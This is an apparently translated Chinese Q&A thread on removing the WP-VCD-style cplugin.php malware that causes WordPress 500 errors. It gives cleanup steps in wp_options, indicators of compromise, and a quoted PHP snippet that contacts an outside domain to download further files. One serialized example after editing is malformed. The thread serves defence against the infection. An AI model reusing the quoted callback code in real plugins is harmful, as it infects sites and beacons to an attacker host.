如何解决由于cplugin.php文件恶意软件导致wordpress网站500错误和中断
最近有一次攻击,由于文件cplugin.PHP
是一种恶意软件,导致许多WordPress网站被关闭。
该恶意软件是错误的书面代码,因此目前主要导致500服务器运行时错误。但是最好将其删除,因为它会迁移到服务器上的所有多个网站,并且具有击中恶意软件URL的代码以下载其他文件。恶意软件代码段:
if(get_option('log_install') !=='1')
{
if(!$log_installed = @file_get_contents("http://www.romndo.com/o2.PHP?host=".$_SERVER["HTTP_HOST"]))
{
$log_installed = @file_get_contents_cplugin("http://www.romndo.com/o2.PHP?host=".$_SERVER["HTTP_HOST"]);
}
}
我想出了一个解决方案,并亲自发布了答案,以帮助那里的所有用户。
编辑:
有报告称同一文件的用户命名不同:ccode.PHP,cplugin.PHP
和helad.PHP
,在这种情况下可以修改此修复程序。
解决方法
这似乎是某种全球性攻击。在plugins文件夹中有一个文件cplugin.php,它会导致站点中断。删除文件没有用,因为它会再次出现。它还会感染多网站服务器上的所有其他站点。幸运的是,在工作了几个小时后,他们已经找到解决办法。请仔细阅读以下内容以修复您的网站:
-
备份数据库和文件
-
编辑您的wp_options表,找到属性
active_plugins
并进行编辑,您将看到它具有cplugin.php的插件条目。我们必须删除它。您的初始数据将如下所示:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;s:11:"cplugin.php";i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
对此进行编辑以删除cplugin.php条目,从i
到下一个;
,然后将其删除。 (确保您备份了数据库,以防万一您犯了一些错误)。没有cplugin.php
的新条目将如下所示:
a:16:{i:0;s:27:"carousel-anything/index.php";i:1;s:36:"contact-form-7/wp-contact-form-7.php";i:2;i:3;s:32:"duplicate-page/duplicatepage.php";i:4;s:31:"envato-market/envato-market.php"....
- 对于名为
site_transient_update_plugins
的wp_option表中的字段,类似地执行此步骤
之前:O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:11:"cplugin.php";s:3:"1.0";s:32:"duplicate-page/duplicatepage.php";.....
之后:O:8:"stdClass":5:{s:12:"last_checked";i:1598414385;s:7:"checked";a:16:{s:27:"carousel-anything/index.php";s:3:"2.0";s:36:"contact-form-7/wp-contact-form-7.php";s:3:"5.2";s:32:"duplicate-page/duplicatepage.php";.....
-
更新字段后,导航回到主插件文件夹
/wp-content/plugins
并删除文件cplugin.php
-
登录到Wordpress仪表板并重新激活所有插件
Voila,您已修复您的网站。
我认为这样做的技术原因是该恶意软件将其自身注册为wordpress插件,该插件在删除后会自动替换文件。幸运的是,该恶意软件的代码编写不正确,因此,如果不运行它,通常会抛出500 error
。但是无论如何,我建议立即删除它,以防更新。
编辑: 根据此topic上的wordpress论坛主题,对于某些用户来说,简单地重命名文件也可以使网站正常工作,这可能是由于wordpress中重命名文件会停用插件,从而导致网站开始工作。但是无论如何我都不会重命名和存储受感染的文件,因此在获得对该网站的访问权限后,至少建议第一种解决方案。
,这不是攻击,而是您自己下载并安装的无效插件或主题中包含的恶意软件。它是WP-VCD的更新版本-WordFence在WP-VCD: The Malware You Installed On Your Own Site中有一份包含所有详细信息的白皮书,也许我们应该将其称为“ WP-VCD Reloaded”:)
妥协指标是ccode.php
中名为cplugin.php
,helad.php
,mplugin.php
和admin_ips.txt
(和wp-content/plugins
)的插件文件和插件/主题,文件夹中有文件class.plugin-modules.php
或class.theme-modules.php
。
清理
- 在
class.plugin-modules.php
或class.theme-modules.php
中找到带有恶意软件的插件或主题,然后删除该插件或主题(如果需要,请从官方来源购买)。 - 删除恶意软件插件:
ccode.php
,cplugin.php
,helad.php
或mplugin.php
。 - 对同一托管帐户/服务器下的所有站点重复此操作。
安装过程似乎确实触及wp-includes/functions.php
,但它只是尝试删除恶意软件,因此这可能是从先前恶意软件版本进行某些升级的一部分。
在我们网站上的数据库中没有任何条目,但是调用代码已添加到wp-includes文件夹中的functions.php的底部。删除有问题的电话,站点立即弹出。 :)
,在名为 cplugin.php 和 helad.php 的wp-content文件夹文件中,可以修改此修复程序。立即将其删除,因为它会迁移到服务器上的所有多个网站,并且具有击中恶意软件URL的代码以下载其他文件。
,您使用主题或插件为空。
- 请到这里扫描主题:https://themecheck.info/
- 这是我的主题:https://themecheck.info/score/wordpress-theme-goto-shared-by-wptry-org.html
- 他们在多个目录中添加了class.theme-modules.php文件,并将代码添加至functions.php文件中
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。